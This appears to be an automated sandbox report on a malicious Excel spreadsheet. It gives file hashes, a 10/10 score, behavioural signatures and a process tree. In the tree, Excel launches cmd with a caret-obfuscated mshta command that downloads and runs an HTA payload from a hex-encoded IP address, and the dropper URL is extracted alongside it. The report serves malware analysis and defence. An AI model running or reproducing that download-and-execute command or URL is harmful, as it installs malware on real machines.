Analysis

  • max time kernel
    133s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/11/2024, 05:29

General

  • Target

    a9a6bde09c84bbea924f8692ee2f1ccf15a71c706280ea1c4a7d2ab189fce030.xls

  • Size

    101KB

  • MD5

    a21898a09a41f3db7770516b83c1ad57

  • SHA1

    fe0a3c3f087cc11db0e9ed13889b231a45e29d79

  • SHA256

    a9a6bde09c84bbea924f8692ee2f1ccf15a71c706280ea1c4a7d2ab189fce030

  • SHA512

    f957b60ed9270c92cfbb70e99f39f9d15deb7bfd3fe916b3fbda4de17e5ac39e0160b119f076482ca3981aad01edac369cc90320359c0cbb0f91b74d8f321eb8

  • SSDEEP

    3072:n/k3hbdlylKsgqopeJBWhZFGkE+cL2NdAFxe53lGvFTQ3IzxgdrvxpU0OKvMB:/k3hbdlylKsgqopeJBWhZFVE+W2NdAOK

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://185.7.214.7/fer/fe3.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\a9a6bde09c84bbea924f8692ee2f1ccf15a71c706280ea1c4a7d2ab189fce030.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4184
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe3.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4912
      • C:\Windows\system32\mshta.exe
        mshta http://0xb907d607/fer/fe3.html
        3⤵
        • Blocklisted process makes network request
        PID:2332

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

    Filesize

    671B

    MD5

    fbf2e5a7489fd4d7162f8ce65f3a9ab0

    SHA1

    2aaaefd88c7598652cd2c4a554ac5b43b8361bb1

    SHA256

    1ad1266dafde0ac6f3d18b15c11ba66960dcba12856a359d7812a985969687e3

    SHA512

    a47184ac989191b29106e5123b46c17d8744779205c05503ac5ef1d7b614634840d5c31485d8a18103d4c3503ce6b0224330993c610ffd4de81814a996e0676c

  • memory/4184-10-0x00007FFA8FC10000-0x00007FFA8FE05000-memory.dmp

    Filesize

    2.0MB

  • memory/4184-4-0x00007FFA4FC90000-0x00007FFA4FCA0000-memory.dmp

    Filesize

    64KB

  • memory/4184-5-0x00007FFA4FC90000-0x00007FFA4FCA0000-memory.dmp

    Filesize

    64KB

  • memory/4184-3-0x00007FFA8FCAD000-0x00007FFA8FCAE000-memory.dmp

    Filesize

    4KB

  • memory/4184-0-0x00007FFA4FC90000-0x00007FFA4FCA0000-memory.dmp

    Filesize

    64KB

  • memory/4184-6-0x00007FFA8FC10000-0x00007FFA8FE05000-memory.dmp

    Filesize

    2.0MB

  • memory/4184-8-0x00007FFA8FC10000-0x00007FFA8FE05000-memory.dmp

    Filesize

    2.0MB

  • memory/4184-7-0x00007FFA8FC10000-0x00007FFA8FE05000-memory.dmp

    Filesize

    2.0MB

  • memory/4184-2-0x00007FFA4FC90000-0x00007FFA4FCA0000-memory.dmp

    Filesize

    64KB

  • memory/4184-9-0x00007FFA8FC10000-0x00007FFA8FE05000-memory.dmp

    Filesize

    2.0MB

  • memory/4184-14-0x00007FFA8FC10000-0x00007FFA8FE05000-memory.dmp

    Filesize

    2.0MB

  • memory/4184-12-0x00007FFA8FC10000-0x00007FFA8FE05000-memory.dmp

    Filesize

    2.0MB

  • memory/4184-11-0x00007FFA4DC30000-0x00007FFA4DC40000-memory.dmp

    Filesize

    64KB

  • memory/4184-15-0x00007FFA8FC10000-0x00007FFA8FE05000-memory.dmp

    Filesize

    2.0MB

  • memory/4184-17-0x00007FFA8FC10000-0x00007FFA8FE05000-memory.dmp

    Filesize

    2.0MB

  • memory/4184-16-0x00007FFA8FC10000-0x00007FFA8FE05000-memory.dmp

    Filesize

    2.0MB

  • memory/4184-18-0x00007FFA4DC30000-0x00007FFA4DC40000-memory.dmp

    Filesize

    64KB

  • memory/4184-13-0x00007FFA8FC10000-0x00007FFA8FE05000-memory.dmp

    Filesize

    2.0MB

  • memory/4184-29-0x00007FFA8FC10000-0x00007FFA8FE05000-memory.dmp

    Filesize

    2.0MB

  • memory/4184-1-0x00007FFA4FC90000-0x00007FFA4FCA0000-memory.dmp

    Filesize

    64KB